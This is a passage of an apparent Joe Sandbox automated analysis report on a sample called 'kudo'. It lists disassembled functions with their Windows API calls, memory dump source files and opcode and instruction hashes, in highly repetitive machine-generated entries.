                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: e2a5f1117e63e4c7f9949507e2ec278ddfcd7d8045254317f4ad84082d179f3c
                                                      • Instruction ID: bbcdebdb4c9defd789b284b55e2404693d42d3381b7c4849b7a9e406f683b846
                                                      • Opcode Fuzzy Hash: e2a5f1117e63e4c7f9949507e2ec278ddfcd7d8045254317f4ad84082d179f3c
                                                      • Instruction Fuzzy Hash: 2511E735204315ABEB297A2CCC0AF7A3714FB41720F204734F921DA5E3CA70AD1093A5
                                                      Function 0088D3B8 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0083B952,?,?,?,?,00000000,?), ref: 0088D432
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: d25c397a96b23a482f00439521428bb9afc1559f5e30e1112a83c2412ef509b9
                                                      • Instruction ID: f9c84b4ca5d939271693f798fc757df5bd735e4d76fc5e49a1838ff1b7fee246
                                                      • Opcode Fuzzy Hash: d25c397a96b23a482f00439521428bb9afc1559f5e30e1112a83c2412ef509b9
                                                      • Instruction Fuzzy Hash: 8101D831600214AFDF14AF29C849FBA3BA1FF46325F444125F9569B2D2C331BC51DBA4
                                                      Function 0080189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00801B04,?,?,?,?,?), ref: 008018E2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: 121376d098c9aa48b6421c2ac9ee41619b0bd3767eff14ae9a3f305e52fbf0a2
                                                      • Instruction ID: 70363a7ad737334692b0afff10315c3f99d7f9dedc9a1de600f83a026b838a1e
                                                      • Opcode Fuzzy Hash: 121376d098c9aa48b6421c2ac9ee41619b0bd3767eff14ae9a3f305e52fbf0a2
                                                      • Instruction Fuzzy Hash: 20F03A34600619DFDF18DF58DC69E6637B2FB54360F508129F9528B2E1CB31E9A0EB50
                                                      Function 0088C8BE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0088C8FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: d16a7fa1c18c7ca3483c1dc974bd0e8a5ef7ba96d9e463ce50166d003e816e03
                                                      • Instruction ID: e52a4eabbec3a30ba7541a295dab8f8c03c8892924be26fbca1fdea390ef9df0
                                                      • Opcode Fuzzy Hash: d16a7fa1c18c7ca3483c1dc974bd0e8a5ef7ba96d9e463ce50166d003e816e03
                                                      • Instruction Fuzzy Hash: BEF06D35250254AFDF21EF98DC09FD77BA5FB09320F044028BA21A72E2CB707860E7A0
                                                      Function 00864C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00864C4A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                      • Instruction ID: 203e22816018c36c9d3bd56c77e7fed7c62d6c8ee19f8aa487ed7423b70661f6
                                                      • Opcode Fuzzy Hash: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                      • Instruction Fuzzy Hash: 7AD09EA516561D79ED1C07649E1FFBE1148F341796FD6B1497601CA2C2ECA05C446131
                                                      Function 008587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858389), ref: 008587D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                      • Instruction ID: 872724b527e7c508dad6b61d5b21434030b5b07a853e0a4a696d755161bebbe9
                                                      • Opcode Fuzzy Hash: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                      • Instruction Fuzzy Hash: 9AD09E3226490EAFEF019EA8DD05EAE3B69FB04B01F408511FE15D51A1C775D935AB60
                                                      Function 0088C909 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0083B9BC,?,?,?,?,?,?), ref: 0088C934
                                                        • Part of subcall function 0088B635: _memset.LIBCMT ref: 0088B644
                                                        • Part of subcall function 0088B635: _memset.LIBCMT ref: 0088B653
                                                        • Part of subcall function 0088B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
                                                        • Part of subcall function 0088B635: CloseHandle.KERNEL32 ref: 0088B694
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                      • String ID:
                                                      • API String ID: 2364484715-0
                                                      • Opcode ID: 876122166914ec3bbd417660ba43985c52a16eb97cdea8e737fc70dd40e848df
                                                      • Instruction ID: 19c1f0b9b60c5b5b6b5a344ac575c881cbc176042dddac2ffbcd82e84de93efe
                                                      • Opcode Fuzzy Hash: 876122166914ec3bbd417660ba43985c52a16eb97cdea8e737fc70dd40e848df
                                                      • Instruction Fuzzy Hash: 0EE0B635110209EFCB11EF58DD55E963BB5FB1C315F018065FA15972B2C731A960EF61
                                                      Function 0080167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00801AEE,?,?,?), ref: 008016AB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: d86569f4c9e5e306c0298f34b02aadcec4415492ee194f6f423bcedca5632a1c
                                                      • Instruction ID: 1bf3b5d8898f214395dd8609514ea0165633f5c343014c1e8a7c05b56e56c8ae
                                                      • Opcode Fuzzy Hash: d86569f4c9e5e306c0298f34b02aadcec4415492ee194f6f423bcedca5632a1c
                                                      • Instruction Fuzzy Hash: 1BE0EC35100208FBCF55AF94DC15E653B26FB58310F508428FA554A2A2CA73A561EB51
                                                      Function 0088C88F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL ref: 0088C8B4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: 4e517733c880f4eb6e9d549b1f3344ba499ac88f8b515d4eedc838d241408733
                                                      • Instruction ID: c3c24d6326fdc92ca8bc9c04706c419bb2e14403d84a148d8909d2076c4d9dcf
                                                      • Opcode Fuzzy Hash: 4e517733c880f4eb6e9d549b1f3344ba499ac88f8b515d4eedc838d241408733
                                                      • Instruction Fuzzy Hash: 58E04275250249EFDB01DF88D945D963BA5FB1D700F414064FA1547362C771A870EBA1
                                                      Function 0088C860 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL ref: 0088C885
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: 3d4cbdf6ad675b01827847ce2e357f10e4179454f0d10b04b825e9ad1b01b843
                                                      • Instruction ID: dff6b62bf61ffd509caff0501cd7b429a9d89bc3791d2f76f986ceb5f93efc6d
                                                      • Opcode Fuzzy Hash: 3d4cbdf6ad675b01827847ce2e357f10e4179454f0d10b04b825e9ad1b01b843
                                                      • Instruction Fuzzy Hash: 59E04275254249EFDB01DF88D885E963BA5FB1D700F014064FA1557362C771A870EB61
                                                      Function 008016B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                        • Part of subcall function 0080201B: DestroyWindow.USER32(?), ref: 008020D3
                                                        • Part of subcall function 0080201B: KillTimer.USER32(-00000001,?), ref: 0080216E
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00801AE2,?,?), ref: 008016D4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                      • String ID:
                                                      • API String ID: 2797419724-0
                                                      • Opcode ID: 8d49625c977931a8aea278a6438da5b5f7c335ed339767232afbb588ae69705c
                                                      • Instruction ID: 4ec4ce629e341127faaf0c6f2886b192886069f7c7979ca700b91a0c865f8ab5
                                                      • Opcode Fuzzy Hash: 8d49625c977931a8aea278a6438da5b5f7c335ed339767232afbb588ae69705c
                                                      • Instruction Fuzzy Hash: C0D01230140308BBDE206B94DC1FF5A3A19FB14750F408020BB04A91D3CAB2A860A659
                                                      Function 0082A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082A12A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                      • Instruction ID: da90b7ffd56ed18129fa560e5e5cdae7a42c1aaa3bcc267af6b2aaa776e17240
                                                      • Opcode Fuzzy Hash: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                      • Instruction Fuzzy Hash: 48A0113000020CAB8A002B8AEC08888BFACEA022A0B008020FA0C802228B32A8208B80
                                                      Function 00818808 Relevance: .6, Instructions: 590COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                      • Instruction ID: 45d18ce5f16396cb5c5d947efa14de7ae5c7ecc4b82ee05a821c0a648e9e7a3a
                                                      • Opcode Fuzzy Hash: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                      • Instruction Fuzzy Hash: 83224630A0451ACBDF388B28C4A67FC7BA5FF01359F28816AD946CB592DB749DC5C742
                                                      Function 008221C5 Relevance: .3, Instructions: 345COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: eaacf1e410b5ce23c5026f84466e5de60622095387f9b9fe8f19119b298087ea
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 36C187322051B349DF6D8639A43803EFAA1FEA27B131A076DD4B3DB1D4EE14D9A5D720
                                                      Function 008225FA Relevance: .3, Instructions: 341COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
